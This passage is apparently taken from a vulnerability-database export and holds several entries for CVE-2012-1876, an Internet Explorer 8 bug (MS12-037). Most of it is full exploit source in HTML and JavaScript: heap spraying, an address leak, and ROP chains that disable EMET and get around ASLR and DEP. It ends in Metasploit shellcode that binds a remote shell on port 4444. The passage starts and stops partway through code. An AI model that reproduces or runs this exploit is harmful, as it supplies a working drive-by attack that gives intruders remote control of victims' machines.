unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u101C%u076d"); // EMET string\r\n shellcode+= unescape("%ue220%u0007"); // EMET offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // Zero out ECX\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // 
PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape("%uc0b8%u6d10");\r\n shellcode+= unescape("%u8b07%u8b00");\r\n shellcode+= unescape("%u6800%u10c8");\r\n shellcode+= unescape("%u076d%ud0ff");\r\n shellcode+= unescape("%ud468%u6d10");\r\n shellcode+= unescape("%u5007%uc4b8");\r\n shellcode+= unescape("%u6d10%u8b07");\r\n shellcode+= unescape("%u8b00%uff00");\r\n shellcode+= unescape("%u8bd0%u81f0");\r\n shellcode+= unescape("%uccec%u0002");\r\n shellcode+= unescape("%uc700%u2404");\r\n shellcode+= unescape("%u0010%u0001");\r\n shellcode+= unescape("%ufc8b%uccb9");\r\n shellcode+= unescape("%u0002%u8300");\r\n shellcode+= unescape("%u04c7%ue983");\r\n shellcode+= unescape("%u3304%uf3c0");\r\n shellcode+= unescape("%u54aa%ufe6a");\r\n shellcode+= unescape("%ud6ff%u9090");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u29eb"); // NOPs\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress\r\n shellcode+= "NTDLL";\r\n shellcode+= unescape("%u0000");\r\n shellcode+= unescape("%u744e%u6553"); // NtSetContextThread\r\n shellcode+= unescape("%u4374%u6e6f");\r\n shellcode+= unescape("%u6574%u7478");\r\n shellcode+= unescape("%u6854%u6572");\r\n shellcode+= unescape("%u6461%u0000");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= 
unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = 
"41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87111"}, {"lastseen": "2017-11-19T13:11:44", "description": "No description provided by source.", "published": "2014-10-10T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87309", "id": "SSV:87309", "sourceData": "\n <!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\r\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( 
string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = 
rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } 
RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop39 = rop.substring(4,8);\r\n var rop40 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\r\n var rop = rop.toString(16);\r\n var rop43 = rop.substring(4,8);\r\n var rop44 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW 
Ptr\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)\r\n shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // 
MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0558%u0000"); // ROP Protections offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // NULL\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u14eb"); // NOPs\r\n shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer\r\n shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET 
string\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +\r\n "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +\r\n "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +\r\n "%ufe6a%ud6ff");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n 
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87309", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "edition": 1, "published": "2014-07-01T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EXPLOITPACK:022449B08C2DE005F39553B5E709DE12", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\n** Offensive Security Research Team\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction 
heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var 